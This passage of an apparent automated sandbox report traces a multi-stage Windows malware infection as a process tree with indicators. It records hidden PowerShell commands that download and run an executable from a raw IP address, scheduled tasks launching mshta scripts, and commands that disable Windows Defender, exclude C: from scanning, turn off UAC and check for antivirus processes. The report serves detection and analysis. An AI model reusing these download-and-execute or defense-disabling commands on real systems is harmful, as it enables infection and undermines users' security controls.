Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com 4720 Seat.com -
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
pid Process 9480 explorer.exe -
Suspicious behavior: MapViewOfSection 10 IoCs
pid Process 1916 h2wb5_002.exe 1916 h2wb5_002.exe 1916 h2wb5_002.exe 13144 SplashWin.exe 13240 cmd.exe 6764 ShortcutTaskAgent.exe 8004 8sb9w_003.exe 8004 8sb9w_003.exe 8004 8sb9w_003.exe 5096 cmd.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
description pid Process Token: SeDebugPrivilege 1804 powershell.exe Token: SeDebugPrivilege 1928 powershell.exe Token: SeDebugPrivilege 1404 powershell.exe Token: SeDebugPrivilege 3876 powershell.exe Token: SeDebugPrivilege 752 XW3ITet.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeDebugPrivilege 3308 powershell.exe Token: SeDebugPrivilege 5096 powershell.exe Token: SeIncreaseQuotaPrivilege 1376 powershell.exe Token: SeSecurityPrivilege 1376 powershell.exe Token: SeTakeOwnershipPrivilege 1376 powershell.exe Token: SeLoadDriverPrivilege 1376 powershell.exe Token: SeSystemProfilePrivilege 1376 powershell.exe Token: SeSystemtimePrivilege 1376 powershell.exe Token: SeProfSingleProcessPrivilege 1376 powershell.exe Token: SeIncBasePriorityPrivilege 1376 powershell.exe Token: SeCreatePagefilePrivilege 1376 powershell.exe Token: SeBackupPrivilege 1376 powershell.exe Token: SeRestorePrivilege 1376 powershell.exe Token: SeShutdownPrivilege 1376 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeSystemEnvironmentPrivilege 1376 powershell.exe Token: SeRemoteShutdownPrivilege 1376 powershell.exe Token: SeUndockPrivilege 1376 powershell.exe Token: SeManageVolumePrivilege 1376 powershell.exe Token: 33 1376 powershell.exe Token: 34 1376 powershell.exe Token: 35 1376 powershell.exe Token: 36 1376 powershell.exe Token: SeIncreaseQuotaPrivilege 1376 powershell.exe Token: SeSecurityPrivilege 1376 powershell.exe Token: SeTakeOwnershipPrivilege 1376 powershell.exe Token: SeLoadDriverPrivilege 1376 powershell.exe Token: SeSystemProfilePrivilege 1376 powershell.exe Token: SeSystemtimePrivilege 1376 powershell.exe Token: SeProfSingleProcessPrivilege 1376 powershell.exe Token: SeIncBasePriorityPrivilege 1376 powershell.exe Token: SeCreatePagefilePrivilege 1376 powershell.exe Token: SeBackupPrivilege 1376 powershell.exe Token: SeRestorePrivilege 1376 powershell.exe Token: SeShutdownPrivilege 1376 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeSystemEnvironmentPrivilege 1376 powershell.exe Token: SeRemoteShutdownPrivilege 1376 powershell.exe Token: SeUndockPrivilege 1376 powershell.exe Token: SeManageVolumePrivilege 1376 powershell.exe Token: 33 1376 powershell.exe Token: 34 1376 powershell.exe Token: 35 1376 powershell.exe Token: 36 1376 powershell.exe Token: SeIncreaseQuotaPrivilege 1376 powershell.exe Token: SeSecurityPrivilege 1376 powershell.exe Token: SeTakeOwnershipPrivilege 1376 powershell.exe Token: SeLoadDriverPrivilege 1376 powershell.exe Token: SeSystemProfilePrivilege 1376 powershell.exe Token: SeSystemtimePrivilege 1376 powershell.exe Token: SeProfSingleProcessPrivilege 1376 powershell.exe Token: SeIncBasePriorityPrivilege 1376 powershell.exe Token: SeCreatePagefilePrivilege 1376 powershell.exe Token: SeBackupPrivilege 1376 powershell.exe Token: SeRestorePrivilege 1376 powershell.exe Token: SeShutdownPrivilege 1376 powershell.exe Token: SeDebugPrivilege 1376 powershell.exe Token: SeSystemEnvironmentPrivilege 1376 powershell.exe -
Suspicious use of FindShellTrayWindow 10 IoCs
pid Process 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 2480 2af4a002ad.exe 2480 2af4a002ad.exe 2480 2af4a002ad.exe 4024 zY9sqWs.exe 4720 Seat.com 4720 Seat.com 4720 Seat.com -
Suspicious use of SendNotifyMessage 9 IoCs
pid Process 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 2480 2af4a002ad.exe 2480 2af4a002ad.exe 2480 2af4a002ad.exe 4720 Seat.com 4720 Seat.com 4720 Seat.com -
Suspicious use of SetWindowsHookEx 3 IoCs
pid Process 12908 HmngBpR.exe 6728 D9ohTv4jcH.exe 9480 explorer.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 516 wrote to memory of 2108 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 84 PID 516 wrote to memory of 2108 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 84 PID 516 wrote to memory of 2108 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 84 PID 516 wrote to memory of 4988 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 85 PID 516 wrote to memory of 4988 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 85 PID 516 wrote to memory of 4988 516 853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe 85 PID 2108 wrote to memory of 5712 2108 cmd.exe 87 PID 2108 wrote to memory of 5712 2108 cmd.exe 87 PID 2108 wrote to memory of 5712 2108 cmd.exe 87 PID 4988 wrote to memory of 1804 4988 mshta.exe 89 PID 4988 wrote to memory of 1804 4988 mshta.exe 89 PID 4988 wrote to memory of 1804 4988 mshta.exe 89 PID 1804 wrote to memory of 4676 1804 powershell.exe 91 PID 1804 wrote to memory of 4676 1804 powershell.exe 91 PID 1804 wrote to memory of 4676 1804 powershell.exe 91 PID 4676 wrote to memory of 3596 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 92 PID 4676 wrote to memory of 3596 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 92 PID 4676 wrote to memory of 3596 4676 TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE 92 PID 3596 wrote to memory of 2480 3596 rapes.exe 93 PID 3596 wrote to memory of 2480 3596 rapes.exe 93 PID 3596 wrote to memory of 2480 3596 rapes.exe 93 PID 2480 wrote to memory of 5544 2480 2af4a002ad.exe 94 PID 2480 wrote to memory of 5544 2480 2af4a002ad.exe 94 PID 2480 wrote to memory of 5544 2480 2af4a002ad.exe 94 PID 2480 wrote to memory of 652 2480 2af4a002ad.exe 95 PID 2480 wrote to memory of 652 2480 2af4a002ad.exe 95 PID 2480 wrote to memory of 652 2480 2af4a002ad.exe 95 PID 5544 wrote to memory of 1188 5544 cmd.exe 97 PID 5544 wrote to memory of 1188 5544 cmd.exe 97 PID 5544 wrote to memory of 1188 5544 cmd.exe 97 PID 652 wrote to memory of 1928 652 mshta.exe 98 PID 652 wrote to memory of 1928 652 mshta.exe 98 PID 652 wrote to memory of 1928 652 mshta.exe 98 PID 3596 wrote to memory of 6136 3596 rapes.exe 100 PID 3596 wrote to memory of 6136 3596 rapes.exe 100 PID 3596 wrote to memory of 6136 3596 rapes.exe 100 PID 6136 wrote to memory of 5688 6136 cmd.exe 102 PID 6136 wrote to memory of 5688 6136 cmd.exe 102 PID 6136 wrote to memory of 5688 6136 cmd.exe 102 PID 6136 wrote to memory of 3608 6136 cmd.exe 103 PID 6136 wrote to memory of 3608 6136 cmd.exe 103 PID 6136 wrote to memory of 3608 6136 cmd.exe 103 PID 3608 wrote to memory of 1404 3608 cmd.exe 104 PID 3608 wrote to memory of 1404 3608 cmd.exe 104 PID 3608 wrote to memory of 1404 3608 cmd.exe 104 PID 1928 wrote to memory of 2856 1928 powershell.exe 105 PID 1928 wrote to memory of 2856 1928 powershell.exe 105 PID 1928 wrote to memory of 2856 1928 powershell.exe 105 PID 3596 wrote to memory of 752 3596 rapes.exe 106 PID 3596 wrote to memory of 752 3596 rapes.exe 106 PID 3596 wrote to memory of 752 3596 rapes.exe 106 PID 6136 wrote to memory of 3440 6136 cmd.exe 107 PID 6136 wrote to memory of 3440 6136 cmd.exe 107 PID 6136 wrote to memory of 3440 6136 cmd.exe 107 PID 3440 wrote to memory of 3876 3440 cmd.exe 108 PID 3440 wrote to memory of 3876 3440 cmd.exe 108 PID 3440 wrote to memory of 3876 3440 cmd.exe 108 PID 752 wrote to memory of 1376 752 XW3ITet.exe 109 PID 752 wrote to memory of 1376 752 XW3ITet.exe 109 PID 752 wrote to memory of 1376 752 XW3ITet.exe 109 PID 6136 wrote to memory of 2376 6136 cmd.exe 111 PID 6136 wrote to memory of 2376 6136 cmd.exe 111 PID 6136 wrote to memory of 2376 6136 cmd.exe 111 PID 2376 wrote to memory of 3308 2376 cmd.exe 112 -
System policy modification 1 TTPs 3 IoCs
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\consentpromptbehavioradmin = "0" D9ohTv4jcH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\enablelua = "0" D9ohTv4jcH.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\promptonsecuredesktop = "0" D9ohTv4jcH.exe -
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
Processes
-
C:\Windows\system32\lsass.exeC:\Windows\system32\lsass.exe1⤵PID:680
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:9956 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:11064
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:11180
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵PID:11476
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:11548
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:11664
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Modifies Windows Defender Real-time Protection settings
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:10112 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:11008
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:11128
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵PID:11436
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:11528
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:4500
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -nop -win 1 -c & {rp hkcu:\environment windir -ea 0;$AveYo=' (\ /) ( * . * ) A limited account protects you from UAC exploits ``` ';$env:1=6;iex((gp Registry::HKEY_Users\S-1-5-21*\Volatile* ToggleDefender -ea 0)[0].ToggleDefender)}2⤵
- Modifies Windows Defender DisableAntiSpyware settings
- Command and Scripting Interpreter: PowerShell
- Modifies data under HKEY_USERS
PID:10372 -
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" qc windefend3⤵
- Launches sc.exe
PID:2396
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /d/r SecurityHealthSystray & "%ProgramFiles%\Windows Defender\MSASCuiL.exe"3⤵PID:11328
-
-
C:\Windows\system32\whoami.exe"C:\Windows\system32\whoami.exe" /groups3⤵PID:11608
-
-
C:\Windows\system32\net1.exe"C:\Windows\system32\net1.exe" stop windefend3⤵PID:11680
-
-
C:\Windows\system32\sc.exe"C:\Windows\system32\sc.exe" config windefend depend= RpcSs-TOGGLE3⤵
- Launches sc.exe
PID:11784
-
-
-
C:\Windows\Explorer.EXEC:\Windows\Explorer.EXE1⤵PID:3460
-
C:\Users\Admin\AppData\Local\Temp\853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe"C:\Users\Admin\AppData\Local\Temp\853f95bab9db7017804bee01b1d328370a48c803a3247d761fdda987dd654373.exe"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:516 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn Gm33FmaqXss /tr "mshta C:\Users\Admin\AppData\Local\Temp\9deJ47dg1.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2108 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn Gm33FmaqXss /tr "mshta C:\Users\Admin\AppData\Local\Temp\9deJ47dg1.hta" /sc minute /mo 25 /ru "Admin" /f4⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:5712
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\9deJ47dg1.hta3⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4988 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'GYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;4⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1804 -
C:\Users\Admin\AppData\Local\TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE"C:\Users\Admin\AppData\Local\TempGYPZVOSSEJNVINDR57JARJ63OJEXIJ86.EXE"5⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4676 -
C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"C:\Users\Admin\AppData\Local\Temp\bb556cff4a\rapes.exe"6⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Downloads MZ/PE file
- Checks BIOS information in registry
- Checks computer location settings
- Executes dropped EXE
- Identifies Wine through registry keys
- Adds Run key to start application
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3596 -
C:\Users\Admin\AppData\Local\Temp\10205910101\2af4a002ad.exe"C:\Users\Admin\AppData\Local\Temp\10205910101\2af4a002ad.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:2480 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn 4jYPemaEqnr /tr "mshta C:\Users\Admin\AppData\Local\Temp\wzqo7paNC.hta" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:5544 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn 4jYPemaEqnr /tr "mshta C:\Users\Admin\AppData\Local\Temp\wzqo7paNC.hta" /sc minute /mo 25 /ru "Admin" /f9⤵
- Scheduled Task/Job: Scheduled Task
PID:1188
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\wzqo7paNC.hta8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:652 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1928 -
C:\Users\Admin\AppData\Local\Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE"C:\Users\Admin\AppData\Local\Temp0GPCTYRPMJH9KQSH8XBLB6P1DNIGPK6E.EXE"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:2856
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\10205920121\am_no.cmd" "7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:6136 -
C:\Windows\SysWOW64\timeout.exetimeout /t 28⤵
- System Location Discovery: System Language Discovery
- Delays execution with timeout.exe
PID:5688
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3608 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 9 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1404
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3440 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 5 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3876
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c powershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"8⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2376 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -command "-join ((48..57) + (65..90) + (97..122) | Get-Random -Count 4 | ForEach-Object {[char]$_})"9⤵
- Command and Scripting Interpreter: PowerShell
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3308
-
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn "eYWh6maWFoE" /tr "mshta \"C:\Temp\rn351DwMk.hta\"" /sc minute /mo 25 /ru "Admin" /f8⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:4276
-
-
C:\Windows\SysWOW64\mshta.exemshta "C:\Temp\rn351DwMk.hta"8⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
PID:6044 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'\483d2fa8a0d53818306efeb32d3.exe';(New-Object System.Net.WebClient).DownloadFile('http://176.113.115.7/mine/random.exe',$d);Start-Process $d;9⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5096 -
C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"C:\Users\Admin\AppData\Local\Temp\483d2fa8a0d53818306efeb32d3.exe"10⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:3732
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206330101\XW3ITet.exe"C:\Users\Admin\AppData\Local\Temp\10206330101\XW3ITet.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:752 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -NoProfile -ExecutionPolicy Bypass -Enc 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⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1376
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206660101\gtjFHJI.exe"C:\Users\Admin\AppData\Local\Temp\10206660101\gtjFHJI.exe"7⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
PID:2616 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe"8⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:5328
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206670101\Go7yA2t.exe"C:\Users\Admin\AppData\Local\Temp\10206670101\Go7yA2t.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
PID:4576 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -WindowStyle Hidden -Command "Expand-Archive -Force \"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002.zip\" \"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002\""8⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:4708
-
-
C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002\h2wb5_002.exe"C:\Users\Admin\AppData\Local\Temp\updater101\h2wb5_002\h2wb5_002.exe"8⤵
- Executes dropped EXE
- Suspicious behavior: MapViewOfSection
PID:1916 -
C:\Windows\SYSTEM32\cmd.execmd.exe /c powershell.exe Add-MpPreference -ExclusionPath 'C:'9⤵PID:564
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe Add-MpPreference -ExclusionPath 'C:'10⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
PID:2444
-
-
-
C:\Windows\system32\svchost.exe"C:\Windows\system32\svchost.exe"9⤵
- Downloads MZ/PE file
- Adds Run key to start application
PID:3852 -
C:\ProgramData\{5A4A035D-A4F9-454A-85ED-D5727334CF26}\dbs.exe"C:\ProgramData\{5A4A035D-A4F9-454A-85ED-D5727334CF26}\dbs.exe" ""10⤵
- Executes dropped EXE
PID:456
-
-
C:\Users\Admin\AppData\Local\Temp\{6A4A035D-A4F9-454A-85ED-D5727334CF36}\dbs.exe"C:\Users\Admin\AppData\Local\Temp\\{6A4A035D-A4F9-454A-85ED-D5727334CF36}\dbs.exe" "{5A4A035D-A4F9-454A-85ED-D5727334CF26}"10⤵
- Executes dropped EXE
PID:2028
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206680101\9CQknW9.exe"C:\Users\Admin\AppData\Local\Temp\10206680101\9CQknW9.exe"7⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2204 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2204 -s 2248⤵
- Program crash
PID:4052
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206690101\HmngBpR.exe"C:\Users\Admin\AppData\Local\Temp\10206690101\HmngBpR.exe"7⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of SetWindowsHookEx
PID:12908 -
C:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Local\Temp\archivebrowser_GD\SplashWin.exe8⤵
- Executes dropped EXE
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:13032 -
C:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exeC:\Users\Admin\AppData\Roaming\archivebrowser_GD\SplashWin.exe9⤵
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:13144 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\SysWOW64\cmd.exe10⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:13240 -
C:\Windows\SysWOW64\explorer.exeC:\Windows\SysWOW64\explorer.exe11⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: AddClipboardFormatListener
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of SetWindowsHookEx
PID:9480
-
-
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206700101\zY9sqWs.exe"C:\Users\Admin\AppData\Local\Temp\10206700101\zY9sqWs.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
PID:4024 -
C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"C:\Users\Admin\AppData\Local\Temp\845cfbab99\Gxtuum.exe"8⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:1724
-
-
-
C:\Users\Admin\AppData\Local\Temp\10206710101\ADFoyxP.exe"C:\Users\Admin\AppData\Local\Temp\10206710101\ADFoyxP.exe"7⤵
- Checks computer location settings
- Executes dropped EXE
- Drops file in Windows directory
- System Location Discovery: System Language Discovery
PID:3948 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c expand Go.pub Go.pub.bat & Go.pub.bat8⤵
- System Location Discovery: System Language Discovery
PID:6044 -
C:\Windows\SysWOW64\expand.exeexpand Go.pub Go.pub.bat9⤵
- System Location Discovery: System Language Discovery
PID:4232
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:3504
-
-
C:\Windows\SysWOW64\findstr.exefindstr /I "opssvc wrsa"9⤵
- System Location Discovery: System Language Discovery
PID:5784
-
-
C:\Windows\SysWOW64\tasklist.exetasklist9⤵
- Enumerates processes with tasklist
- System Location Discovery: System Language Discovery
PID:6208
-
-
C:\Windows\SysWOW64\findstr.exefindstr "bdservicehost AvastUI AVGUI nsWscSvc ekrn SophosHealth"9⤵
- System Location Discovery: System Language Discovery
PID:5172
-
-
C:\Windows\SysWOW64\cmd.execmd /c md 3530909⤵
- System Location Discovery: System Language Discovery
PID:6804
-
-
C:\Windows\SysWOW64\extrac32.exeextrac32 /Y /E Really.pub9⤵
- System Location Discovery: System Language Discovery
PID:6872
-
-
C:\Windows\SysWOW64\findstr.exefindstr /V "posted" Good9⤵
- System Location Discovery: System Language Discovery
PID:2876
-
-
C:\Windows\SysWOW64\cmd.execmd /c copy /b 353090\Seat.com + Pf + Somewhere + Volumes + Commission + Lane + Hit + Strong + Copied + Wearing + Acquire 353090\Seat.com9⤵
- System Location Discovery: System Language Discovery
PID:5632
-
-
